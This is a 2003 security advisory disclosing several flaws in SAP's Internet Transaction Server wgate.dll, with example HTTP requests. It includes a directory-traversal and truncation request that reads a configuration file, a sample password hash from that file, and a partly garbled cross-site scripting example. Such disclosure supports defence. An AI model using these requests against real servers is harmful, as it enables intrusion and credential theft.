[01.09.2003] Internet Transaction Server Multiple Vulnerabilities Product: ITS ITS, Version 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0) Vendor: SAP (http://www.sap.com/) Vendor-Status: vendor contacted (02.08.2003) Vendor-Patchs: SAP advice 598074,595383 and 654038 Vulnerablities * Path/information disclosure * Directory traversal * Filename truncation * Arbitrary file disclosure * Cross site scripting/Cookie Theft Exploitable Local: --- Remote: YES Introduction Visit "http://www.sap.com" and try to find additional information. Vulnerability Details 1) DIRECTORY/INFO DISCLOSURE OBJECT: wgate.dll (win32 CGI-Communication binary) DESCRIPTION: Insufficient input- and output validation on miscellaneous userinput allows the insertion of non existing values for the following user supplied paramters: ################## ~service ~templatelanguage ~language ~theme ~template ################## Thus leading to several unwanted error messages which may include sensitive information on operating-system, software version and the directory structure of the attacked server. EXAMPLE: ---*--- Http-Request: www.server.name/scripts/wgate/pbw2/!? with params: ~runtimemode=DM& ~language=en& ~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx& ---*--- REMARKS: It might be possible that "~template" is an undocumented or forgotten variable (NOT confirmed). 2) ARBITRARY FILE DISCLOSURE (Directory Traversal / File Truncation) OBJECT: wgate.dll (win32 CGI-Communication binary) DESCRIPTION: EXAMPLE: ---*--- Http-Request: www.server.name/scripts/wgate/pbw2/!? with params: ~language=en& ~runtimemode=DM& ~templatelanguage=& ~language=en& ~theme=..\..& ~template=services\global.srvc+++++++ ++++++ +++++++++++ +++++++ +++++++ ++++++ ++++ +++++ +++++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++ +++++++ ++ ---*--- (where "+" stands for spaces "%20" uri encoded). Above will respond with the global server configuration file "global.srvc" on an ITS default-installation. Normally the default-template extension (.html ?) gets concatenated to the rest of the template information. Most probably somebody wanted to avoid a possible Bufferoverflow by truncating the input values if they exceed a given length. Thus making it possible to shed the ".html" extension. For some strange reason now and then the program responds with an error-message instead of giving out the requested file. This might be due to unwanted?/additional? HTTP-Request-Header infos (NOT confirmed). REMARKS: The global configuration file "global.srvc" contains username and des-encrypted password ---*--- ~password des26(2c94f116f4393f3d) ~login Master ---*--- A good DES-cracker should be able to crack this password-hash either by using wordlistst or by brute-force methods (NOT confirmed). 3) CROSS SITE SCRIPTING / COOKIE THEFT OBJECT: wgate.dll (win32 CGI-Communication binary) DESCRIPTION: Insufficient input- and output validation on miscellaneous userinput-parameters enables insertion of html/client side scripting tags. EXAMPLE: ---*--- Http-Request: www.server.name/scripts/wgate.dll? with params: ~service=-->---*--- REMARKS: Due to excessive usage of cookies for managing sessions and/or states cookie-theft is very likely. There might be several other location where html/scripting tags can be inserted (NOT confirmed). GENERAL REMARKS Above findings derive from an external(black box) security test. we would like to apologize in advance for potential nonconformities and/or known issues. Recommended Hotfixes software patch(es). EOF Martin Eiszner / @2003 m.eiszner at sec-consult dot com